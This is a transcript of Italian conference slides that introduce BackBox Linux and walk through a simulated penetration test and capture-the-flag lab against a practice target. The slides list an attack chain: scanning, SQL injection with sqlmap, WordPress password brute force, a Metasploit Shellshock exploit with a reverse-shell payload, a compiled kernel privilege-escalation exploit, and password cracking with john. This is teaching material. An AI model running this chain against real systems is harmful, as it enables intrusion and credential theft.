BackBox Linux: Simulazione di un Penetration Test e CTF

Post on 24-Jan-2017

1.079 views 4 download

Transcript of BackBox Linux: Simulazione di un Penetration Test e CTF

BackBox LinuxPenetration Test and Security Assessment

RaspiBO - 23 Febbraio 2016

Simulazione di un Penetration Test

Andrea Draghetti

About Me

BackBox Team Member

Over Security Founder

Independent Security Researcher

….

About BackBox

BackBox è una distribuzione Free Open Source nata nel 2010 in Italia ed è concepita per gli appassionati di Sicurezza Informatica!

Permette di effettuare Penetration Testing e Security Assessment.

È basata su Ubuntu, offre oltre 100 Tools dedicati al mondo dell’IT Security, Mobile Analysis, ecc.

Ha un piano di rilascio previsto ogni 4 mesi e compatibile con

ecosistemi a 32 o 64Bit.

Look At The WorldDistroWatch attesta

a BackBox la seconda posizione della sua

categoria. È la 56° distro Linux più scaricata

al mondo.

BackBox 4.5 ha ottenuto oltre

40mila download dal 26 Gennaio 2016

Linux User & Developer - Feb 2016

Screenshot

Follow BackBox

backbox.org

launchpad.net/~backbox

facebook.com/backbox.linux

twitter.com/backboxlinux

Penetration Test

Il penetration test è un processo di valutazione della sicurezza di un sistema o di una rete che simula

l’attacco di un utente malintenzionato. L’analisi viene condotta sfruttando l’intelletto umano e software

dedicati, ed ha come obiettivo quello di evidenziare le debolezze del sistema fornendo il maggior numero di informazioni sulle vulnerabilità che hanno permesso

l’accesso non autorizzato.

Simulazione di un Penetration Test

I. Information Gathering II. Vulnerability Assessment III. Exploitation IV. Privilege Escalation V. Maintaining Access VI. Reporting.

Documento completo sulla simulazione di un Penetration Test

http://www.isticom.it/documenti/rivista/rivista2013/2013_12_129-134_simulazione_penetration_test.pdf

Standard, in fase di definizione, degli elementi fondamentali di un PenTest

http://www.pentest-standard.org

Lab: Capture the Flag

Capture the Flag, letteralmente “cattura la bandiera”, è una modalità di simulazione del Penetration Testing per allenarsi e

migliorare le proprie abilità.

vulnhub.com contiene un importante archivio di macchine virtuali preparate per effettuare penetration testing in locale.

ctftime.org raggruppa i principali eventi di CTF mondiali e i punteggi dei partecipanti.

seeweb.it annualmente organizza una sfida di Hacking con importanti premi in palio.

Lab

BackBox Linux

Target: hackme.site

Flag: /root/flag.txt

Lab: Information Gathering

BackBox Linux

• Porte • 22 SSH • 80 Apache

• Web • /phpmyadmin • /wp • /panel • /info • /cgi-bin

• dirs3arch -u http://hackme.site -e php • nmap -A -v hackme.site • nmap -sn 192.168.x.1-254

Target: hackme.site

Lab: Vulnerability Assessment

BackBox Linux

• Porte • 22 SSH • 80 Apache

• Web • /phpmyadmin • /wp • /panel • /info • /cgi-bin

• Panel • SQL Injection

Target: hackme.site

• sqlmap -u http://hackme.site/panel --form • dirs3arch -u http://hackme.site -e php • nmap -A -v hackme.site • nmap -sn 192.168.x.1-254

Lab: Vulnerability Assessment

BackBox Linux

Target: hackme.site

• Porte • 22 SSH • 80 Apache

• Web • /phpmyadmin • /wp • /panel • /info • /cgi-bin

• Panel • SQL Injection

• Wordpress • XSS Vulnerability • No Brute force protection

• wpscan -u http://hackme.site/wp --wordlist psw.txt --username admin

• wpscan -u http://hackme.site/wp -e u • wpscan -u http://hackme.site/wp -e p • sqlmap -u http://hackme.site/panel --form • dirs3arch -u http://hackme.site -e php • nmap -A -v hackme.site • nmap -sn 192.168.x.1-254

Lab: Exploitation

BackBox Linux

Target: hackme.site

• Porte • 22 SSH • 80 Apache

• Web • /phpmyadmin • /wp • /panel • /info • /cgi-bin

• Panel • SQL Injection

• Wordpress • XSS Vulnerability • No Brute force protection

• CGI • Shellshock Vulnerability

• shell and more… • exploit • set options … • set PAYLOAD linux/x86/meterpreter/

reverse_tcp • use exploit/multi/http/

apache_mod_cgi_bash_env_exec • msfconsole • wpscan -u http://hackme.site/wp

--wordlist psw.txt --username admin • wpscan -u http://hackme.site/wp -e u • wpscan -u http://hackme.site/wp -e p • sqlmap -u http://hackme.site/panel --form • dirs3arch -u http://hackme.site -e php • nmap -A -v hackme.site • nmap -sn 192.168.x.1-254

Lab: Privilege Escalation

BackBox Linux

Target: hackme.site

• Porte • 22 SSH • 80 Apache

• Web • /phpmyadmin • /wp • /panel • /info • /cgi-bin

• Panel • SQL Injection

• Wordpress • XSS Vulnerability • No Brute force protection

• CGI • Shellshock Vulnerability

• Shell • Kernel Privilege Escalation

• extra: john pass • extra: unshadow passwd shadow > pass • cat /root/flag.txt • ./exploit • gcc 18411.c -o exploit • shell and more… • exploit • set options … • set PAYLOAD linux/x86/meterpreter/

reverse_tcp • use exploit/multi/http/

apache_mod_cgi_bash_env_exec • msfconsole • wpscan -u http://hackme.site/wp

--wordlist psw.txt --username admin • wpscan -u http://hackme.site/wp -e u • wpscan -u http://hackme.site/wp -e p • sqlmap -u http://hackme.site/panel --form • dirs3arch -u http://hackme.site -e php • nmap -A -v hackme.site • nmap -sn 192.168.x.1-254

Lab

BackBox Linux

Target: hackme.site

Happy Hacking!

Questions?

andrea@backbox.org